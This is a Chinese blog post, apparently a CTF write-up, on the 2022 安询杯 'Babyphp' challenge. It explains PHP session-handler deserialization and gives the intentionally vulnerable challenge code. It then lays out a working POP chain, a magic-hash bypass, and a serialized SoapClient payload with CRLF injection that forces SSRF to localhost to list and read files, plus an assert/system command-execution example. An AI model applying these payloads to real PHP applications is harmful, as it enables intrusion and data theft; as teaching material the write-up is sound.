2022 安询杯 Babyphp

已于 2022-11-30 15:33:33 修改
阅读量2.2k 收藏 3
点赞数 1
分类专栏: CTF 文章标签: php 开发语言
于 2022-11-30 15:01:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64815693/article/details/128103059
版权

里面的知识点有session反序列化、原生类的利用、soap ssrf,对于我这种菜鸡还是挺有难度的。。。

基本

session反序列化

我们主要了解这里就可以了

session.serialize_handler的引擎有看下面。
注:php_serialize是从5.5.4开始使用的。

处理器名称存储格式
php键名 + 竖线 + 经过serialize()函数序列化处理的值
php_binary键名的长度对应的 ASCII 字符 + 键名 + 经过serialize()函数序列化处理的值

php_serialize

经过serialize()函数序列化处理的数组

处理器-php

<?php

highlight_file(__FILE__);
ini_set('session.serialize_handler', 'php');
session_start();
$_SESSION['session'] = $_GET['session'];
var_dump($SESSION);

我们访问网页,通过session参数传入一个2,他会在一个tmp的文件夹下面生成一个文件。

那么怎么找到这个文件呢,毕竟每一个人的路径肯定有区别的,这里我们可以Everything这个工具来搜索sess_,就可以知道路径了,接下来我们看看生成了什么。

//生成的
session|s:1:"2";

竖杠的左边是他的键名,右边是他的键值。
也正是键名 + 竖线 + 经过serialize()函数序列化处理的值

处理器-php_binary

<?php

highlight_file(__FILE__);
ini_set('session.serialize_handler', 'php_binary');
session_start();
$_SESSION['session'] = $_GET['session'];
var_dump($SESSION);

这里就是我们使用的代码,然后传入2,这里修改了一下PHPSESSID为aaa,然后就会生成一个sess_aaa的文件。

//生成的
sessions:1:"2";

session前面是还有一个字符因为不可见的缘故大家看不到。

处理器-php_serialize

<?php

highlight_file(__FILE__);
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION['session'] = $_GET['session'];
var_dump($SESSION);

老样子输入一个2,它里面文件的内容是

a:1:{s:7:"session";s:1:"2";}

这里php_serialize在内部简单地直接使用 serialize/unserialize函数,他是会自动进行反序列化这就是我们需要利用的。

这里写两个来进行举例 :

这里使用这两个

<?php

highlight_file(__FILE__);
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION['session'] = $_GET['session'];
var_dump($SESSION);

<?php
highlight_file(__FILE__);

ini_set('session.serialize_handler', 'php');
session_start();

class A
{
    public $a;
    public function __destruct()
    {
        echo($this->a);
    }
}

我们这里写一串序列化的东西,看看下面那个是否会输出phpinfo()

O:1:"A":1:{s:1:"a";s:9:"phpinfo()";}

首先我们在上面那个传入

?session=|O%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A9%3A%22phpinfo()%22%3B%7D

记住这里要加竖杠,因为第二个文件的解释器是php,我们要让前面成为键名,后面是键值,让他只解析后面的序列化好的字符串,然后这里他会写入一个PHPSESSID里面,我们带着这个一个去访问下面那个文件。

 这里我们看到属性a没有任何赋值,但是最后确实是输出了phpinfo().

我们去看看生成的文件,里面的内容是怎么样的。

a:1:{s:7:"session";s:37:"|O:1:"A":1:{s:1:"a";s:9:"phpinfo()";}

php_serialize处理器是进行了一次php序列化,但是我们传入了一个|,在php处理器的理解是

这三部分

a:1:{s:7:"session";s:37:"  //键名,这个是不解析的

|  //分隔符

O:1:"A":1:{s:1:"a";s:9:"phpinfo()";}  //键值

注意

使用SoapClient类报错的师傅注意一下,这里提供一个我那时候处理的方法,windows的。

我们使用Everything工具,寻找php.ini,找到自己版本的php.ini,然后找到extension=soap去掉前面的分号就可以了

题目

注:以下为自己搭的环境,可能和题目的是有一点区别的。

index.php

// index.php
<?php
//something in flag.php


class A
{
    public $a;
    public $b;


    public function __wakeup()
    {
        $this->a = "babyhacker";
    }


    public function __invoke()
    {
        if (isset($this->a) && $this->a == md5($this->a)) {
            $this->b->uwant();
        }
    }
}


class B
{
    public $a;
    public $b;
    public $k;


    public function __destruct()
    {
        $this->b = $this->k;
        die($this->a);
    }
}


class C
{
    public $a;
    public $c;


    public function __toString()
    {
        $cc = $this->c;
        return $cc();
    }
    public function uwant()
    {
        if ($this->a == "phpinfo") {
            phpinfo();
        } else {
            echo "1";
            call_user_func(array(reset($_SESSION), $this->a));
        }
    }
}



if (isset($_GET['d0g3'])) {
    ini_set($_GET['baby'], $_GET['d0g3']);
    session_start();
    $_SESSION['sess'] = $_POST['sess'];
} else {
    session_start();
    if (isset($_POST["pop"])) {
        unserialize($_POST["pop"]);
    }
}
var_dump($_SESSION);
highlight_file(__FILE__);

 flag.php

//flag.php
<?php
session_start();
highlight_file(__FILE__);
if ($_SERVER["REMOTE_ADDR"]==="127.0.0.1") {
    $f1ag=implode(array(new $_GET['a']($_GET['b'])));
    $_SESSION["F1AG"]= $f1ag;
} else {
    echo "only localhost!!";
}

这里看到int_set,session_start这些的就可以想到session反序列化,然后在flag.php我们可以使用了$_SERVER["REMOTE_ADDR"],他的意思是检测当前运行脚本所在服务器的 IP 地址必须为127.0.0.1,其实这里就很好想到soap ssrf,接下来发现我们下面我们可以自定义我们new的类和内容,这时候我们就可以使用原生类。

 pop链还是很好触发的。

C::uwant() <- A::__invoke() <- C::__toString() <- B::__destruct()

 然后我们还需要绕过几个东西,首先__wakeup(),我们可以加一处理,但是有疑惑这里题目的环境是7.4,所以我这里使用的也是7.4,但是这不符合__wakeup绕过的版本限制,但是就是可以,原题环境尝试的时候也是可以的,一些大佬也不是特别清楚,有知道的可以说一下吗。。。

然后就是if (isset($this->a) && $this->a == md5($this->a)) 这个判断我们可以使用0e215962017绕过,所以就没了。

<?php

class A
{
    public $a='0e215962017';
    public $b;
}

class B
{
    public $a='1';
    public $b='2';
    public $k='2';
}

class C
{
    public $a='aa';
    public $c;
}
$a = new A();
$b = new B();
$c = new C();
$d = new C();
$b -> a = $c;
$c -> c = $a;
$a -> b = $d;
echo serialize($b);

这里我们着重分析一下这个 call_user_func(array(reset($_SESSION), $this->a));

首先$_SESSION是我们通过sess传入的,然后就是$this->a,这里就是我们自己传入的。

然后就是reset函数,这里用代码看一下

<?php
$b = array("sess"=>'assert');
$c = reset($b);
echo $c;

//回显
assert

然后就是call_user_func,这个没加array,之前是可以执行代码的,当命令执行函数使用,这里他是不支持eval函数的。

call_user_func('assert', 'system("dir");');

加上array以后,就是执行一个类下面的方法,这里回显aaaa。

<?php

class A
{
    public $a;
    public function aaaa()
    {
        echo "aaaaa";
    }
}
call_user_func(array('A','aaaa'));

所以我们只能通过这来执行一个类下面的方法,但是这个ABC这三个类中都没有我们可以帮助我们获得flag的方法,这时候结合上面的flag.php,其实就可以想到用这个来触发一个不存在方法来触发,SoapClient类中的__call()魔术方法,然后来进行soap ssrf。

 然后是exp,这里先使用这个,因为是本地的环境,flag文件就在这个目录,所以我使用glob协议匹配的当前目录,还有就是因为我本地环境的端口是9004,所以这里也是需要改的,如果各位本地搭建的时候,目录有变化也是要加进去的。

<?php

$a = new SoapClient(null, array('location' => 'http://127.0.0.1:9004/flag.php?a=FilesystemIterator&b=glob://./*f*',
    'user_agent' => "aaa\r\nCookie:PHPSESSID=flaghahahahaha",
    'uri' => "http://127.0.0.1:9004/"));
$b = serialize($a);
echo "|".urlencode($b);

//然后设置
get:?baby=session.serialize_handler&d0g3=php_serialize
post:sess=|O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A22%3A%22http%3A%2F%2F127.0.0.1%3A9004%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A66%3A%22http%3A%2F%2F127.0.0.1%3A9004%2Fflag.php%3Fa%3DFilesystemIterator%26b%3Dglob%3A%2F%2F.%2F%2Af%2A%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A36%3A%22aaa%0D%0ACookie%3APHPSESSID%3Dflaghahahahaha%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

cookie:PHPSESSID=flaghahahahaha

下面之后知道是可以不用的。

//下一步我们需要触发SoapClient
get:?baby&d0g3
post:sess=SoapClient

 然后传入pop链的内容,来触发call_user_func那里了

get不需要传东西
post:pop=O:1:"B":4:{s:1:"a";O:1:"C":2:{s:1:"a";s:2:"aa";s:1:"c";O:1:"A":2:{s:1:"a";s:11:"0e215962017";s:1:"b";O:1:"C":2:{s:1:"a";s:2:"aa";s:1:"c";N;}}}s:1:"b";s:1:"2";s:1:"k";s:1:"2";}

 他这时候会回显,这个代表我们成功了。

然后带着我们的cookie: PHPSESSID=flaghahahahaha,去访问重新访问index.php

 这里看到在最后面我们知道了,flag就叫flag,在当前目录(这些是我自己设的)

然后我们就要使用SplFileObject来读取文件内容,然后重新上面的步骤。

<?php

$a = new SoapClient(null, array('location' => 'http://127.0.0.1:9004/flag.php?a=SplFileObject&b=./flag',
    'user_agent' => "aaa\r\nCookie:PHPSESSID=flaghahahahaha",
    'uri' => "http://127.0.0.1:9004/"));
$b = serialize($a);
echo "|".urlencode($b);

这里就可以获得flag。

练习两年半的篮球选..哦不对安全选手
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
DoYouHaoBaby PHP开发框架 v2.5.2.rar
08-30
DoYouHaoBaby(全名:The DoYouHaoBaby PHP Framework)是一个极具美学价值的PHP开发框架,从代码、注释、文 档以及系统工具的用户界面均追求干净、整洁而高效。DoYouHaoBaby 具备了大量丰富的特性: 包括MVC, ActiveRecord, 国际化语言包, 缓存组件, 分布式服务器部署, 领域驱动设计, 模式扩展, 模板引擎,RBAC权限扩展和测试等等。她能够快速地构建一个企业级应用。 程序功能: 1.PHP autoload自动载入 2.多元化的URL模式 3.丰富的数据库查询语言 4.内置Code和Tag两种风格迥异的模板引擎 5.多语言支持 6.分布式数据库特性支持 7.内置常用的缓存机制 8.AJAX支持 9.更多功能等待你的发掘... 安装: 1.将DoYouHaoBaby 2.5 压缩包解压至一个空文件夹。 2.DoYouHaoBaby不需要进行任何特殊的安装,只需要直接部署即可。
2022安洵[babyPHP]看Soap+CLRF造成SSRF漏洞
Aiwin的博客
11-28 2559
Soap+CLRF组合拳造成SSRF漏洞以及例题2022安洵 BabyPHP、[LCTF 2018]bestphp's revenge。
babyphp(反序列化pop链,字符逃逸)
weixin_43610673的博客
02-28 1711
题目在BBUCTF有复现,但代码里dbuser,dbpass,database有修改https://buuoj.cn/challenges#[GYCTF2020]Easyphp 扫描目录发现www.zip源码泄露,下载审计 在Update.php看到 即登录成功就获取flag 看了下login.php,感觉登录框这里是做不了什么文章了 主要的内容都是在lib.php 根据Update.php里...
i春秋2020新春疫战 非SQL题目解析
a3320315的博客
02-25 1174
Ezupload 这道题目可能是师傅的失误,在上传后缀名过滤的数组中有一些失误~~ 导致直接上传php马,得到flag~~ 这儿贴一下上传shell查看的源码 <?php error_reporting(0); header("Content-type: text/html; charset=utf-8"); $sandbox='sandbox/'.md5($_SERVER['remote_...
Baby PHP - hacklu CTF 2018
stepone4ward的博客
07-13 726
代码审计
CTF_Web长征路细刷题笔记
Mark的博客
01-06 4360
文件包含一、2018 XCTF FINALS —— babyphp二、 一、2018 XCTF FINALS —— babyphp 0x01信息收集 打开环境可以看到几个关键点,首先便是看到有两个可控变量 1: $_GET[‘function’] 执行函数 2: $_POST[‘name’] 可控制session值内容 其次又看到include($file);存在文件包含,ini_set限定了文件包含目录 最后可见call_user_func($func,$_GET)这个函
记一道CTF题babyphp之学习代码注入
xiaotaode2012的专栏
08-18 5339
0x00写在前面的话 最近打算刷刷CTF题目,提升一下自身的见识面,这里碰到了一个代码注入的题目特作记录,大牛勿喷。。。 0x01做题的整体思路 做题的地址,http://web.jarvisoj.com:32798/ 打开地址,随机点击发现都是展示对应的界面,做过开发的我,直觉告诉我应该是传入一个字符串展示对应页面,这样我随机点了一下,发现about里面有
极客巅峰 2020 babyphp2(phar反序列化)
y0un9er
10-02 724
文章目录前言一、什么是 phar 反序列化1.三个条件2.生成 phar 文件的常见代码题目分析下载源码classes.php生成 phar 文件总结 前言 这题比赛的时候,我一脸懵逼,大佬提示才知道源码泄露。但是之前没做过 phar 反序列化的题,二脸懵逼。还好源码没删,自己搭建了环境,看着大佬们的wp复现一番。点击打开题目 VPS 20年12月10号过期,望见谅。 一、什么是 phar 反序列化 利用Phar:// 伪协议读取phar文件时,会反序列化meta-data储存的信息。phar简介 .
php竞赛,京津冀大学生竞赛:babyphp
weixin_39884738的博客
03-12 199
京津冀大学生竞赛:babyphp比赛的时候没作出来,回来之后一会就作出来了,难受。。。仍是基本功不扎实,都不记得__invoke怎么触发的了php放上源码函数error_reporting(1);class Read {public $var;public function file_get($value){$text = base64_encode(file_get_contents($valu...
nkctf——baby_php
weixin_73668856的博客
04-10 276
简单的记录一下
php数组转字符串的函数,php数组转成字符串implode() 函数
weixin_34892992的博客
03-12 202
如果仅仅是合并,倒简单:$new= implode('',array('a','b','c','d','e','f','g'));但如果考虑再恢复成数组,所以你一定要使用分隔符才行,不然取不出来啊。合并和取出的代码如下,你看看//将数组合成一个变量,用|符分格;$new=implode("|",array(a,b,c,d,e,f,g));echo "变量值为:";echo $new;echo "\...
安洵2022 Web Writeup
渗透测试研究中心
12-01 873
babyphp index.php: <?php //something in flag.php class A { public $a; public $b; public function __wakeup() { $this->a = "babyhacker"; } public function __invo...
NSSCTF刷题记录
kindyyy的博客
03-13 829
NSSctf的刷题记录,有错误欢迎指正
2022-安询-复盘
Luodehahajiang的博客
01-06 365
该漏洞是由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。导出HTTP对象后,按大小排序,发现一个secret.zip,导出来。压缩包里有625张黑白照片,25*25,一个二维码。官方wp给的复现CVE-2022-22733漏洞。将二进制文件转为十六进制,再保存为压缩包。html直接用wbstego4解密。base64解密得到管理员密码。里面是一个html,需要密码。
2022安洵babyphp
uuzfumo的博客
12-04 324
2022安洵PHP反序列化和SSRF结合
2023 安询 ez_cpp
最新发布
qq_35231971的博客
06-28 175
ez_cpp
[代码审计][PHAR]巅峰极客babyphp2学习压缩过滤器触发phar
Y4tacker的博客
09-29 4158
前言:我要当赛棍!!! 文章目录序列化与反序列化基本介绍PHP反序列化漏洞原理常用的魔法函数__wakeup()绕过:CVE-2016-7124__set:巅峰极客babyphp2bypass phar:// 不能出现在首部本题关键源码Phar利用参考文章 序列化与反序列化 基本介绍 序列化是将变量转换为可保存或传输字符串的过程 反序列化就是在适当的时候把这个字符串再转化成之前的变量来使用 php进行序列化的目的是保存一个对象方便以后重用 php提供了serialize和unserialize函数用以进行
2022安洵web题复现
m0_62422842的博客
11-28 1768
个人觉得赛题质量蛮好的,只是自己太菜了,花了很长时间都在琢磨第一道web,因为一些细节上的问题导致一直解不出来。赛后就找师傅的wp重新去复现一下,总结自己的问题,在此记录一下,以便日后复习。慢慢学习,慢慢积累。又是崇拜大师傅的一天~
jarvis OJ web babyphp
qq_43677324的博客
04-02 1016
babyphp 考完二级后我又要回归web狗了 今天做到一道web题 上题: http://web.jarvisoj.com:32798/ 进入后: 发现应该有git泄露 因此我们使用githack进行获得源码 打开cmd 输入:python2 GitHack.py http://web.jarvisoj.com:32798/.git/ #这里的python2是我设置的用于区分python3 即这...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值